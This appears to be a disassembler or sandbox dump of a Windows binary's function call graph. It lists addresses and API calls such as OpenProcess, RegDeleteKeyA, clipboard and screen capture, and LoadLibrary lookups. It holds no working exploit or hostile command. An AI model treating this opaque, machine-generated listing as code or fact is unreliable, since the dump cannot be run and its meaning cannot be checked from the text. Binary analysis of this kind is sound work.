40460d MultiByteToWideChar 5685->5688 5686->5685 5689 40464a LoadLibraryA 5687->5689 5690 40462c MultiByteToWideChar 5687->5690 5688->5687 5691 4046a1 GetLastError 5689->5691 5692 40465b GetProcAddress 5689->5692 5690->5689 5693 4046a9 5691->5693 5694 404693 5692->5694 5695 40466b 5692->5695 5696 404698 FreeLibrary 5694->5696 5695->5696 5697 404689 GetLastError 5695->5697 5696->5693 5697->5696 4731 40f414 4732 40223f 2 API calls 4731->4732 4733 40f45e 4732->4733 4734 40223f 2 API calls 4733->4734 4735 40f46c Shell_NotifyIcon 4734->4735 4737 406215 4742 40e185 strchr 4737->4742 4741 406241 4743 40e19c 4742->4743 4744 40e1ae strchr 4742->4744 4745 40e1a0 _strcmpi 4743->4745 4744->4743 4746 40e1c8 memset 4744->4746 4747 406235 4745->4747 4753 402395 4746->4753 4747->4741 4750 40e31d EnumWindows 4747->4750 4751 40e351 EnumWindows 4750->4751 4752 40e35c 4750->4752 4751->4752 4752->4741 4754 402399 _mbscpy strchr 4753->4754 4754->4743 4755 40ee16 4772 40ebbe EnumWindows 4755->4772 5698 405118 5699 40514b 5698->5699 5700 40512f 5698->5700 5701 405154 PostQuitMessage 5699->5701 5702 405158 NtdllDefWindowProc_A 5699->5702 5700->5702 5703 405147 PostQuitMessage 5700->5703 5701->5702 5703->5699 4773 40e21b 4774 40e185 6 API calls 4773->4774 4775 40e22e 4774->4775 4776 40e233 memcpy 4775->4776 4777 40e254 4775->4777 4776->4777 4778 40f022 4779 40f03c 4778->4779 4780 40f107 GetLastError 4779->4780 4781 40f047 4779->4781 4782 40f0e5 4780->4782 4783 40f0f2 GetLastError 4781->4783 4784 40f05e 4781->4784 4783->4782 4785 40f07b 4784->4785 4786 40f08d 4784->4786 4790 40f0ce 4784->4790 4785->4782 4788 40f089 GetLastError 4785->4788 4789 40f09a GetLastError 4786->4789 4792 40f0a1 4786->4792 4787 40f0e3 GetLastError 4787->4782 4788->4782 4789->4790 4790->4782 4790->4787 4791 40f0a5 Sleep 4791->4792 4792->4790 4792->4791 5704 406124 _strcmpi 5705 406135 5704->5705 5706 406139 _strcmpi 5704->5706 5707 406150 _strcmpi 5706->5707 5708 40614a 5706->5708 5709 406161 5707->5709 5710 406167 _strcmpi 5707->5710 5711 406178 5710->5711 5712 40617e _strcmpi 5710->5712 5713 407124 5716 402dbe GetWindowPlacement SetWindowPlacement SetForegroundWindow 5713->5716 5715 40712c 5716->5715 4096 407225 GetWindowPlacement 4097 4070ad ShowWindow 4096->4097 4099 4076e8 4097->4099 4793 407c26 memset 4794 407c66 _strcmpi 4793->4794 4795 407c9a 4793->4795 4796 407c82 4794->4796 4797 407c7d 4794->4797 4798 40223f 2 API calls 4795->4798 4799 405fcf 15 API calls 4796->4799 4802 40f21c 10 API calls 4797->4802 4800 407c98 4798->4800 4801 407c87 4799->4801 4811 402441 GetFileAttributesA 4800->4811 4801->4795 4801->4797 4802->4800 4804 407cb3 CoInitialize memset 4816 4028de GetModuleFileNameA 4804->4816 4806 407cde 4817 403390 memset _mbscpy 4806->4817 4809 407d2d 4810 4059bd MessageBoxA 4810->4809 4812 402458 4811->4812 4813 40245c _mbscpy strrchr 4811->4813 4812->4804 4814 402490 CreateDirectoryA 4813->4814 4815 402480 4813->4815 4814->4804 4815->4814 4816->4806 4818 4033f3 strlen strlen 4817->4818 4819 4033d7 strchr 4817->4819 4821 403413 4818->4821 4822 403428 _mbscat 4818->4822 4820 4033eb 4819->4820 4820->4818 4820->4819 4831 40249d _mbscpy 4821->4831 4825 40345a _mbscpy 4822->4825 4826 40344a 4822->4826 4828 403458 4825->4828 4834 4023ae _mbscpy strrchr 4826->4834 4836 403297 4828->4836 4832 4021c8 2 API calls 4831->4832 4833 4024af _mbscat 4832->4833 4833->4822 4835 4023c7 4834->4835 4835->4828 4838 4032be 4836->4838 4837 403375 4837->4809 4837->4810 4838->4837 4839 40334a MultiByteToWideChar 4838->4839 4839->4837 5717 407526 5718 4028f0 8 API calls 5717->5718 5719 407534 GetDlgItem 5718->5719 5720 40754a SendMessageA 5719->5720 5722 4076e8 5720->5722 4840 403227 4841 40323b ??2@YAPAXI 4840->4841 4842 40322d ??3@YAXPAX 4840->4842 4842->4841 4843 401428 4844 40143d 4843->4844 4846 401446 4843->4846 4847 40317c 4844->4847 4848 403198 ??2@YAPAXI memset memcpy 4847->4848 4849 40318d 4847->4849 4850 4031f2 4848->4850 4851 4031eb ??3@YAXPAX 4848->4851 4849->4848 4849->4850 4850->4846 4851->4850 5723 409f2d 5724 409f30 5723->5724 5725 409ebd GetLastError 5723->5725 5729 40e6e6 18 API calls 5724->5729 5726 409ed3 sprintf 5725->5726 5727 4020ef 6 API calls 5725->5727 5728 409efd MessageBoxA 5726->5728 5739 409895 5726->5739 5727->5726 5728->5739 5731 409f40 5729->5731 5730 409f73 5744 40ea5a 5730->5744 5731->5730 5743 40e8bc RegOpenKeyExA 5731->5743 5735 409f93 RegDeleteKeyA 5738 409fa1 GetLastError 5735->5738 5735->5739 5736 409f85 5737 4059bd MessageBoxA 5736->5737 5737->5739 5740 4020ef 6 API calls 5738->5740 5741 409fbe sprintf 5740->5741 5741->5739 5742 409fe8 MessageBoxA 5741->5742 5742->5739 5743->5730 5749 40e8bc RegOpenKeyExA 5744->5749 5746 40ea76 5747 409f7f 5746->5747 5748 40ea7d RegQueryInfoKeyA RegCloseKey 5746->5748 5747->5735 5747->5736 5748->5747 5749->5746 5750 407d34 memset 5751 407d71 atoi 5750->5751 5752 407d7b _strcmpi 5750->5752 5751->5752 5753 407da0 5752->5753 5754 407da9 _strcmpi 5752->5754 5755 407dd4 5753->5755 5756 404d14 15 API calls 5753->5756 5754->5753 5757 407e24 5755->5757 5758 407de9 _strcmpi 5755->5758 5756->5755 5761 40223f 2 API calls 5757->5761 5759 407e04 5758->5759 5760 407e09 5758->5760 5765 40f21c 10 API calls 5759->5765 5762 405fcf 15 API calls 5760->5762 5763 407e1f 5761->5763 5764 407e0e 5762->5764 5766 402441 4 API calls 5763->5766 5764->5757 5764->5759 5765->5763 5767 407e45 CoInitialize 5766->5767 5768 407e64 5767->5768 5769 403390 14 API calls 5768->5769 5770 407ea0 5769->5770 5771 407ebb 5770->5771 5772 4059bd MessageBoxA 5770->5772 5772->5771 4857 40da35 LoadLibraryA 4858 40da50 GetProcAddress 4857->4858 4859 40da91 4857->4859 4860 40da62 4858->4860 4861 40da8a FreeLibrary 4858->4861 4860->4861 4861->4859 5773 404738 memset memset GetWindowsDirectoryA strlen strlen 5774 4047ba 5773->5774 5776 4047d1 5773->5776 5775 40249d 4 API calls 5774->5775 5775->5776 5809 402434 5776->5809 5779 404937 FindWindowA 5781 4049b1 5779->5781 5782 404948 GetWindowThreadProcessId PostMessageA 5779->5782 5780 4047e9 FindWindowA 5780->5781 5783 4047ff GetWindowThreadProcessId 5780->5783 5784 4046b0 4 API calls 5782->5784 5783->5781 5785 404813 OpenProcess 5783->5785 5786 404966 memset 5784->5786 5787 404860 5785->5787 5788 40482b 5785->5788 5789 404975 CreateProcessA 5786->5789 5790 4049a3 5787->5790 5791 404869 PostMessageA 5787->5791 5812 4012e6 5788->5812 5789->5790 5790->5781 5795 4049a8 FreeLibrary 5790->5795 5815 4046b0 5791->5815 5795->5781 5796 404859 CloseHandle 5796->5787 5797 404881 5799 4023ff GetVersionExA 5797->5799 5798 401309 5 API calls 5800 404850 CloseHandle 5798->5800 5801 404887 5799->5801 5800->5796 5802 4048aa memset memset MultiByteToWideChar 5801->5802 5803 40488d EnumWindows 5801->5803 5819 4012b7 5802->5819 5804 4046b0 4 API calls 5803->5804 5822 4046f1 IsWindowVisible 5803->5822 5807 4048a9 5804->5807 5807->5802 5808 404926 memset 5808->5789 5810 4023ff GetVersionExA 5809->5810 5811 402439 5810->5811 5811->5779 5811->5780 5813 401269 5 API calls 5812->5813 5814 4012ee 5813->5814 5814->5796 5814->5798 5816 4046e4 Sleep 5815->5816 5817 4046b8 OpenProcess 5815->5817 5816->5797 5817->5816 5818 4046cf WaitForSingleObject CloseHandle 5817->5818 5818->5797 5820 401269 5 API calls 5819->5820 5821 4012bf CloseHandle 5820->5821 5821->5790 5821->5808 5823 404731 5822->5823 5824 404706 GetWindowThreadProcessId 5822->5824 5824->5823 5825 40471e 5824->5825 5825->5823 5826 404722 PostMessageA 5825->5826 5826->5823 5827 401338 LoadLibraryA GetProcAddress GetModuleHandleA GetProcAddress 5828 401372 5827->5828 5829 40d139 5830 40d15d GetDeviceCaps GetDeviceCaps 5829->5830 5831 40d13d 5829->5831 5861 405a62 _strcmpi 5830->5861 5858 401c4f 5831->5858 5835 40d181 5838 40d1b1 5835->5838 5839 40d185 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 5835->5839 5836 40b400 5855 401b93 5836->5855 5837 40d14a GetDC 5837->5830 5840 40d206 CreateCompatibleBitmap CreateCompatibleDC SelectObject BitBlt _strcmpi 5838->5840 5841 40d1bf atoi atoi atoi atoi 5838->5841 5839->5838 5843 40d2a4 5840->5843 5844 40d267 OpenClipboard 5840->5844 5841->5840 5862 401f8a 5843->5862 5845 40d276 EmptyClipboard SetClipboardData CloseClipboard SelectObject DeleteDC 5844->5845 5846 40b3f8 5844->5846 5850 40d2cf ReleaseDC 5845->5850 5852 401c89 5846->5852 5853 401baa 11 API calls 5852->5853 5854 401c91 5853->5854 5854->5836 5856 401ba3 5855->5856 5857 401b99 FreeLibrary 5855->5857 5857->5856 5859 401baa 11 API calls 5858->5859 5860 401c5d 5859->5860 5860->5836 5860->5837 5861->5835 5869 401d40 5862->5869 5865 401fc3 SelectObject DeleteDC DeleteObject 5865->5850 5870 401baa 11 API calls 5869->5870 5871 401d48 5870->5871 5871->5865 5872 401f32 memset MultiByteToWideChar 5871->5872 5878 401d06 5872->5878 5875 401d64 5876 401baa 11 API calls 5875->5876 5877 401d6c 5876->5877 5877->5865 5879 401baa 11 API calls 5878->5879 5880 401d14 5879->5880 5882 401d27 5880->5882 5883 401d7c memset wcsrchr 5880->5883 5882->5875 5884 401dc1 _wcsicmp 5883->5884 5885 401e73 5883->5885 5886 401dd2 wcscpy 5884->5886 5887 401de5 _wcsicmp 5884->5887 5897 401e8b 5885->5897 5886->5887 5889 401df6 _wcsicmp 5887->5889 5890 401e07 wcscpy 5887->5890 5889->5890 5892 401e1a _wcsicmp 5889->5892 5890->5892 5893 401e2b _wcsicmp 5892->5893 5894 401e3c wcscpy 5892->5894 5893->5894 5895 401e4f _wcsicmp 5893->5895 5894->5895 5895->5885 5896 401e60 wcscpy 5895->5896 5896->5885 5898 401baa 11 API calls 5897->5898 5899 401ea2 5898->5899 5900 401ec1 malloc 5899->5900 5901 401e85 5899->5901 5900->5901 5902 401ed1 5900->5902 5901->5882 5903 401baa 11 API calls 5902->5903 5907 401edd 5903->5907 5904 401f11 ??3@YAXPAX 5904->5901 5905 401ef8 wcscmp 5905->5904 5905->5907 5907->5904 5907->5905 5908 410b3b _XcptFilter 4862 409e3e 4863 409ea3 4862->4863 4864 409e43 ??3@YAXPAX 4862->4864 4868 40ea19 3 API calls 4863->4868 4864->4863 4865 409d64 4864->4865 4866 409895 4865->4866 4867 409d6a RegCloseKey 4865->4867 4867->4866 4869 409eac 4868->4869 4869->4866 4870 409eb3 GetLastError 4869->4870 4871 4020ef 6 API calls 4870->4871 4872 409ed3 sprintf 4871->4872 4872->4866 4873 409efd MessageBoxA 4872->4873 4873->4866 5909 40153f 5910 401549 5909->5910 5913 40252e 6 API calls 5910->5913 5912 401558 5913->5912 4874 4024c1 4875 4023ae 2 API calls 4874->4875 4876 4024d9 FindFirstFileA 4875->4876 4877 4024f1 4876->4877 4878 402529 4876->4878 4880 40250b FindNextFileA 4877->4880 4881 40251d FindClose 4877->4881 4882 405e66 memset 4877->4882 4880->4877 4880->4881 4881->4878 4891 4025af strcmp 4882->4891 4885 405f16 4885->4877 4886 405ead strlen strlen 4887 405ec9 4886->4887 4888 405ed8 4886->4888 4889 40249d 4 API calls 4887->4889 4888->4885 4894 405d22 4888->4894 4889->4888 4892 4025c3 strcmp 4891->4892 4893 4025d7 4891->4893 4892->4893 4893->4885 4893->4886 4903 405cba _strcmpi 4894->4903 4897 405cba 9 API calls 4898 405d56 4897->4898 4899 405cba 9 API calls 4898->4899 4900 405d6b 4899->4900 4910 402883 4900->4910 4904 405cf0 4903->4904 4905 405cd4 GetSystemTime SystemTimeToFileTime 4903->4905 4916 405c19 strlen memset 4904->4916 4906 405ceb 4905->4906 4906->4897 4909 405cff SystemTimeToFileTime LocalFileTimeToFileTime 4909->4906 4911 402891 GetFileAttributesA 4910->4911 4912 4028a3 CreateFileA 4910->4912 4911->4912 4915 40289e 4911->4915 4913 4028d8 4912->4913 4914 4028bf SetFileTime CloseHandle 4912->4914 4913->4885 4914->4913 4915->4912 4917 405c3c 4916->4917 4924 405ca8 4916->4924 4930 4025de memcpy atoi 4917->4930 4919 405c46 4931 4025de memcpy atoi 4919->4931 4921 405c53 4932 4025de memcpy atoi 4921->4932 4923 405c63 4923->4923 4923->4924 4933 4025de memcpy atoi 4923->4933 4924->4906 4924->4909 4926 405c8e 4934 4025de memcpy atoi 4926->4934 4928 405c9b 4935 4025de memcpy atoi 4928->4935 4930->4919 4931->4921 4932->4923 4933->4926 4934->4928 4935->4924 4936 407ec2 4938 407ecf 4936->4938 4937 407efa 4938->4937 4939 408817 89 API calls 4938->4939 4940 407eef 4939->4940 4941 40367c 3 API calls 4940->4941 4941->4937 4942 40eac7 memset GetClassNameA _strcmpi 4943 40eb1c 4942->4943 4944 40eb1f _strcmpi 4942->4944 4943->4944 4945 40eb36 4944->4945 4946 40fcc9 4947 40fd2c 4946->4947 4948 40fcd9 4946->4948 4948->4947 4949 40fcf5 _wcsicmp 4948->4949 4949->4948 4950 40fd07 _wcsicmp 4949->4950 4950->4947 4950->4948 5914 401fca memset MultiByteToWideChar 5915 401baa 11 API calls 5914->5915 5916 402017 5915->5916 5917 40204e 5916->5917 5918 401f32 28 API calls 5916->5918 5919 402042 5918->5919 5920 401d64 11 API calls 5919->5920 5920->5917 4951 4070cb 4952 40299d 6 API calls 4951->4952 4953 4070db SetWindowPos 4952->4953 4955 4076e8 4953->4955 4956 406ecc 4957 40dc41 15 API calls 4956->4957 4958 406ed1 EnumWindows 4957->4958 4959 410ccf 4960 410ce6 4959->4960 4961 410cd8 FreeLibrary 4959->4961 4961->4960 4962 4044d0 LoadLibraryA GetProcAddress 4963 4044f9 4962->4963 4964 40e2d0 GetWindowThreadProcessId 4965 40e2f0 4964->4965 4966 40e315 4964->4966 4967 40e303 PostMessageA 4965->4967 4968 40e2f6 IsWindowVisible 4965->4968 4967->4966 4968->4966 4968->4967 5921 404bd1 _strcmpi 5922 404be2 5921->5922 5923 404be6 _strcmpi 5921->5923 5924 404bf7 5923->5924 5925 404bfd _strcmpi 5923->5925 5926 404c14 _strcmpi 5925->5926 5927 404c0e 5925->5927 5928 404c25 5926->5928 5929 404c2b _strcmpi 5926->5929 5930 404c42 _strcmpi 5929->5930 5931 404c3c 5929->5931 5932 404c53 5930->5932 5933 404c59 _strcmpi 5930->5933 5934 404c70 _strcmpi 5933->5934 5935 404c6a 5933->5935 5936 404c81 5934->5936 5937 404c87 _strcmpi 5934->5937 5938 404c98 5937->5938 5939 404c9c _strcmpi 5937->5939 5940 404cad 5939->5940 5941 40fbd3 memset 5942 40fc10 5941->5942 5943 40fc3a ??3@YAXPAX 5942->5943 5944 40fc4b 5942->5944 5945 40fc5b 5942->5945 5943->5945 5944->5945 5946 402269 3 API calls 5944->5946 5946->5945 5955 4061d5 5956 40e185 6 API calls 5955->5956 5957 4061f5 5956->5957 5958 406201 5957->5958 5959 40e368 3 API calls 5957->5959 5959->5958 5960 4019d6 5965 4013ac 5960->5965 5963 4019fe 5964 4013ac 10 API calls 5964->5963 5966 4013d3 GetDlgItem GetWindowTextLengthA 5965->5966 5970 4013b8 5965->5970 5967 401413 5966->5967 5968 4013ed 5966->5968 5969 402fb1 6 API calls 5967->5969 5971 402f66 4 API calls 5968->5971 5972 4013ce 5969->5972 5976 4023d1 5970->5976 5974 4013f7 5971->5974 5972->5963 5972->5964 5975 4023d1 2 API calls 5974->5975 5975->5972 5977 4023da SetDlgItemTextA 5976->5977 5978 4023eb GetDlgItemTextA 5976->5978 5977->5972 5978->5972 4969 405ad7 ??2@YAPAXI 4975 40e6d7 4969->4975 4971 405b6f ??3@YAXPAX 4972 40e6d7 8 API calls 4973 405b0c 4972->4973 4973->4971 4973->4972 4979 405a7d 4973->4979 4976 40e6e4 4975->4976 4977 40e6df 4975->4977 4976->4973 4984 40e65f 4977->4984 4981 405a92 4979->4981 4980 40e6d7 8 API calls 4980->4981 4981->4980 4982 405ac0 Sleep 4981->4982 4983 405ad1 4981->4983 4982->4981 4982->4983 4983->4973 4985 40e665 FreeLibrary 4984->4985 4986 40e66f LoadLibraryA 4984->4986 4985->4986 4987 40e680 6 API calls 4986->4987 4988 40e6cf 4986->4988 4987->4988 4988->4976 5979 402bde GetClipboardData 5980 402ca9 CloseClipboard 5979->5980 5981 402bfc GlobalFix 5979->5981 5982 402ca8 5981->5982 5983 402c0e 5981->5983 5982->5980 5984 402c14 CreateFileA SetFilePointer 5983->5984 5985 402c38 5983->5985 5986 402c43 GetFileSize 5984->5986 5998 40218d CreateFileA 5985->5998 5989 402c5c 5986->5989 5990 402c4f 5986->5990 5988 402c40 5988->5986 5991 402c64 wcslen WriteFile 5989->5991 5992 402c9e GlobalUnWire 5989->5992 5999 402dfb WriteFile 5990->5999 5994 402c90 CloseHandle 5991->5994 5995 402c80 5991->5995 5992->5982 5994->5992 6000 402dfb WriteFile 5995->6000 5997 402c8d 5997->5994 5998->5988 5999->5989 6000->5997 6001 4063df 6002 40d92c 13 API calls 6001->6002 6003 4063f9 6002->6003 6032 40e395 6003->6032 6005 406441 6006 406446 6005->6006 6048 40e5d5 6005->6048 6008 40655a 6006->6008 6009 40646d memset MultiByteToWideChar OpenProcess 6006->6009 6010 40656b 6008->6010 6011 40655f FreeLibrary 6008->6011 6012 4064f9 6009->6012 6013 4064be 6009->6013 6014 40e631 ??3@YAXPAX 6010->6014 6011->6010 6015 40654c 6012->6015 6016 4064fe memset 6012->6016 6017 4012e6 5 API calls 6013->6017 6018 406573 6014->6018 6015->6008 6020 406551 FreeLibrary 6015->6020 6019 4012b7 5 API calls 6016->6019 6021 4064ce 6017->6021 6022 40e631 ??3@YAXPAX 6018->6022 6023 406539 GetLastError 6019->6023 6020->6008 6024 4064e8 GetLastError 6021->6024 6027 401309 5 API calls 6021->6027 6025 40657b 6022->6025 6026 405a52 9 API calls 6023->6026 6053 405a52 6024->6053 6030 406547 CloseHandle 6026->6030 6031 4064e3 CloseHandle 6027->6031 6030->6015 6031->6024 6033 40e631 ??3@YAXPAX 6032->6033 6034 40e3b0 CreateToolhelp32Snapshot memset Process32First 6033->6034 6035 40e52d Process32Next 6034->6035 6036 40e3f0 OpenProcess 6035->6036 6037 40e544 CloseHandle 6035->6037 6038 40e43c memset 6036->6038 6041 40e4df 6036->6041 6037->6005 6056 40e557 6038->6056 6040 40e4ee ??3@YAXPAX 6040->6041 6041->6035 6041->6040 6042 402269 3 API calls 6041->6042 6042->6041 6043 40e47f GetModuleHandleA 6045 40e48e GetProcAddress 6043->6045 6046 40e46b 6043->6046 6044 40dc6c 10 API calls 6047 40e4d5 CloseHandle 6044->6047 6045->6046 6046->6043 6046->6044 6047->6041 6049 40e625 6048->6049 6050 40e5e5 6048->6050 6049->6006 6050->6049 6051 40e5f0 _mbsicmp 6050->6051 6052 40e60b _mbsicmp 6050->6052 6051->6049 6051->6050 6052->6049 6052->6050 6062 4059e7 6053->6062 6059 40e57f 6056->6059 6060 40e55f 6059->6060 6061 40e584 6 API calls 6059->6061 6060->6046 6061->6060 6063 4059f7 GetLastError 6062->6063 6064 4059ff 6062->6064 6063->6064 6065 4020ef 6 API calls 6064->6065 6066 405a0b sprintf 6065->6066 6067 405a37 MessageBoxA 6066->6067 6068 405a4e CloseHandle 6066->6068 6067->6068 6068->6012 6069 4071e1 GetWindowPlacement 6070 4070ad ShowWindow 6069->6070 6072 4076e8 6070->6072 6073 4075e6 6074 407602 6073->6074 6075 402a1d 2 API calls 6074->6075 6076 40765d InvalidateRect 6075->6076 6077 4076e8 6076->6077 4989 410ce8 4992 40f4ed 4989->4992 4999 40e631 4992->4999 4995 40e631 ??3@YAXPAX 4996 40f504 4995->4996 4997 40e631 ??3@YAXPAX 4996->4997 4998 40f50f 4997->4998 5000 40e637 ??3@YAXPAX 4999->5000 5001 40e63e 4999->5001 5000->5001 5001->4995 6078 4099ea ??3@YAXPAX 6079 409895 6078->6079 6080 406fee 6081 40299d 6 API calls 6080->6081 6082 407011 6081->6082 6083 40299d 6 API calls 6082->6083 6084 40701f GetModuleHandleA GetProcAddress 6083->6084 6086 407055 6084->6086 4100 4076ef 4103 407701 memset GetWindowTextA strlen 4100->4103 4102 4076fd 4104 407772 4103->4104 4157 407932 4103->4157 4163 405a62 _strcmpi 4104->4163 4107 407784 4109 40779c 4107->4109 4110 407788 _strcmpi 4107->4110 4108 4079c3 4111 4079c7 IsWindowVisible 4108->4111 4112 4079ee 4108->4112 4164 405a62 _strcmpi 4109->4164 4110->4109 4111->4112 4113 4079d4 GetWindowRect 4111->4113 4161 405a62 _strcmpi 4112->4161 4113->4112 4116 407a07 4118 407aa2 4116->4118 4119 407a0f IsWindowVisible 4116->4119 4117 4077ba 4120 4077d7 4117->4120 4121 4077be _strnicmp 4117->4121 4162 405a62 _strcmpi 4118->4162 4119->4118 4123 407a20 memset GetClassNameA _strcmpi 4119->4123 4165 405a62 _strcmpi 4120->4165 4121->4120 4123->4118 4126 407a5e _strcmpi 4123->4126 4125 4077ed 4127 4077fe 4125->4127 4166 4021ea strlen strlen 4125->4166 4126->4118 4128 407a73 _strcmpi 4126->4128 4170 405a62 _strcmpi 4127->4170 4128->4118 4131 407a88 GetWindowRect 4128->4131 4131->4118 4132 407ac0 4132->4102 4133 407819 4134 40785e 4133->4134 4135 40781d strlen 4133->4135 4171 405a62 _strcmpi 4134->4171 4135->4134 4136 407831 strlen _strnicmp 4135->4136 4136->4134 4138 407874 4139 407894 4138->4139 4141 40787f GetWindowLongA 4138->4141 4172 405a62 _strcmpi 4139->4172 4141->4139 4142 4078aa 4143 4078ae memset GetClassNameA _strcmpi 4142->4143 4144 4078eb 4142->4144 4143->4144 4173 405a62 _strcmpi 4144->4173 4146 407901 4147 407909 IsWindowVisible 4146->4147 4146->4157 4148 40791a GetWindowThreadProcessId 4147->4148 4147->4157 4149 407951 4148->4149 4148->4157 4174 40dc41 4149->4174 4152 40795a memset 4182 40dda8 4152->4182 4153 40799e 4193 4059bd 4153->4193 4156 407980 4158 407989 _strcmpi 4156->4158 4160 405a62 _strcmpi 4157->4160 4158->4157 4159 407998 4158->4159 4159->4157 4160->4108 4161->4116 4162->4132 4163->4107 4164->4117 4165->4125 4167 402211 4166->4167 4168 402232 4166->4168 4167->4168 4169 402215 _memicmp 4167->4169 4168->4127 4169->4167 4169->4168 4170->4133 4171->4138 4172->4142 4173->4146 4196 402423 4174->4196 4177 40dc51 4209 40db11 4177->4209 4178 40dc4a 4199 40dba9 4178->4199 4181 407956 4181->4152 4181->4153 4183 40ddb5 4182->4183 4184 402423 GetVersionExA 4183->4184 4185 40ddc0 4184->4185 4186 40ddc4 4185->4186 4187 40de1d 4185->4187 4188 40ddcc OpenProcess 4186->4188 4189 40de26 4186->4189 4222 40dd29 4187->4222 4188->4189 4192 40dde1 CloseHandle 4188->4192 4189->4156 4192->4189 4194 4059e4 4193->4194 4195 4059cd MessageBoxA 4193->4195 4194->4157 4195->4194 4219 4023ff 4196->4219 4200 40dc3f 4199->4200 4201 40dbb6 LoadLibraryA 4199->4201 4200->4181 4201->4200 4202 40dbc8 GetProcAddress 4201->4202 4203 40dbe0 GetProcAddress 4202->4203 4208 40dc24 4202->4208 4204 40dbf1 GetProcAddress 4203->4204 4203->4208 4206 40dc02 GetProcAddress 4204->4206 4204->4208 4205 40dc38 FreeLibrary 4205->4200 4207 40dc13 GetProcAddress 4206->4207 4206->4208 4207->4208 4208->4200 4208->4205 4210 40dba7 4209->4210 4211 40db1e LoadLibraryA 4209->4211 4210->4181 4211->4210 4212 40db30 GetProcAddress 4211->4212 4213 40db48 GetProcAddress 4212->4213 4218 40db8c 4212->4218 4214 40db59 GetProcAddress 4213->4214 4213->4218 4216 40db6a GetProcAddress 4214->4216 4214->4218 4215 40dba0 FreeLibrary 4215->4210 4217 40db7b GetProcAddress 4216->4217 4216->4218 4217->4218 4218->4210 4218->4215 4220 40240e GetVersionExA 4219->4220 4221 40241f 4219->4221 4220->4221 4221->4177 4221->4178 4223 40dd86 4222->4223 4224 40dd3f 4222->4224 4223->4189 4224->4223 4225 40dd7f CloseHandle 4224->4225 4226 40dd8d _mbscpy CloseHandle 4224->4226 4225->4223 4226->4223 5002 401aef 5011 401a8a 5002->5011 5005 401b68 5006 401b0a memset MultiByteToWideChar 5007 401b4e 5006->5007 5022 401a73 5007->5022 5012 401a24 FreeLibrary 5011->5012 5013 401a96 LoadLibraryA 5012->5013 5014 401aa7 GetProcAddress 5013->5014 5019 401ac2 5013->5019 5015 401abb 5014->5015 5014->5019 5028 401a39 5015->5028 5016 401a73 FreeLibrary 5018 401ae5 5016->5018 5020 401a24 FreeLibrary 5018->5020 5019->5016 5021 401aea 5019->5021 5020->5021 5021->5005 5021->5006 5023 401a81 5022->5023 5024 401a7a FreeLibrary 5022->5024 5025 401a24 5023->5025 5024->5023 5026 401a31 5025->5026 5027 401a2a FreeLibrary 5025->5027 5026->5005 5027->5026 5029 401a73 FreeLibrary 5028->5029 5030 401a41 5029->5030 5031 401a69 5030->5031 5032 401a58 GetProcAddress 5030->5032 5031->5019 5032->5031 5033 4098f0 5034 4098fe 5033->5034 5035 408817 89 API calls 5034->5035 5036 409922 Sleep 5034->5036 5037 409895 5034->5037 5035->5034 5036->5034 5038 4082f3 5041 40826d memset 5038->5041 5042 4082b1 _mbscpy 5041->5042 5043 4082c4 _mbscat 5041->5043 5042->5043 5046 40804c 5043->5046 5047 408059 5046->5047 5048 40807f 6 API calls 5047->5048 5064 4108e8 5047->5064 5049 40811b 5048->5049 5054 408125 5048->5054 5067 40dae2 5049->5067 5053 408258 5054->5053 5055 408197 memset memset 5054->5055 5056 40820e 5054->5056 5071 4028de GetModuleFileNameA 5055->5071 5059 40dae2 2 API calls 5056->5059 5062 408221 5056->5062 5058 4081d3 _mbscpy 5060 4021c8 2 API calls 5058->5060 5059->5062 5061 4081ed _mbscat CopyFileA 5060->5061 5061->5056 5062->5053 5063 40dae2 2 API calls 5062->5063 5063->5053 5072 4108c2 5064->5072 5066 40807e 5066->5048 5068 40daeb LoadLibraryA 5067->5068 5069 40daff GetProcAddress 5067->5069 5068->5069 5070 40db0c 5068->5070 5069->5070 5070->5054 5071->5058 5073 4108d1 __dllonexit 5072->5073 5074 4108cb _onexit 5072->5074 5073->5066 5074->5073 6087 4037f3 6088 40e631 ??3@YAXPAX 6087->6088 6089 403806 EnumDisplayMonitors 6088->6089 6090 40e631 ??3@YAXPAX 6089->6090 6091 403821 memset memset EnumDisplayDevicesA 6090->6091 6092 403a5b 6091->6092 6093 40386f 6091->6093 6094 403870 EnumDisplayDevicesA 6093->6094 6103 4036f3 memset EnumDisplaySettingsA 6094->6103 6096 4036f3 3 API calls 6098 403925 6096->6098 6097 403a3e EnumDisplayDevicesA 6097->6092 6097->6094 6098->6096 6098->6097 6099 4039fe ??3@YAXPAX 6098->6099 6100 402269 3 API calls 6098->6100 6101 40223f 2 API calls 6098->6101 6099->6098 6100->6098 6102 403996 _mbsicmp 6101->6102 6102->6098 6104 403773 GetLastError 6103->6104 6105 40373f 6103->6105 6104->6105 6105->6098 5075 407af4 memset 5076 407b34 _strcmpi 5075->5076 5077 407b6b 5075->5077 5078 407b50 5076->5078 5079 407b4b 5076->5079 5080 40223f 2 API calls 5077->5080 5081 405fcf 15 API calls 5078->5081 5084 40f21c 10 API calls 5079->5084 5082 407b66 5080->5082 5083 407b55 5081->5083 5088 407b95 5082->5088 5095 404d14 memset 5082->5095 5083->5077 5083->5079 5084->5082 5085 402441 4 API calls 5087 407ba8 CoInitialize memset 5085->5087 5112 4028de GetModuleFileNameA 5087->5112 5088->5085 5090 407bd4 5091 403390 14 API calls 5090->5091 5092 407c04 5091->5092 5093 407c1f 5092->5093 5094 4059bd MessageBoxA 5092->5094 5094->5093 5096 404d44 5095->5096 5097 404d61 memcpy 5096->5097 5098 404d7a _mbscpy 5096->5098 5103 404f42 5096->5103 5111 404f0e atoi 5096->5111 5099 404d8a _strcmpi 5097->5099 5098->5099 5099->5096 5100 404dad _strcmpi 5099->5100 5100->5096 5101 404dd0 _strcmpi 5100->5101 5101->5096 5102 404df3 _strcmpi 5101->5102 5102->5096 5104 404e16 _strcmpi 5102->5104 5103->5088 5104->5096 5105 404e36 _strcmpi 5104->5105 5105->5096 5106 404e56 _strcmpi 5105->5106 5106->5096 5107 404e76 _strcmpi 5106->5107 5107->5096 5108 404e96 _strcmpi 5107->5108 5108->5096 5109 404eb6 _strcmpi 5108->5109 5109->5096 5110 404ed3 _strcmpi 5109->5110 5110->5096 5111->5096 5112->5090 5113 4014f5 5114 401502 5113->5114 5115 401529 5113->5115 5114->5115 5116 401519 EndDialog 5114->5116 5116->5115 5117 4074f8 SetWindowTextA 5118 4076e8 5117->5118 5119 4072f9 5120 40299d 6 API calls 5119->5120 5121 407311 5120->5121 5122 40299d 6 API calls 5121->5122 5123 40731d 5122->5123 5124 40299d 6 API calls 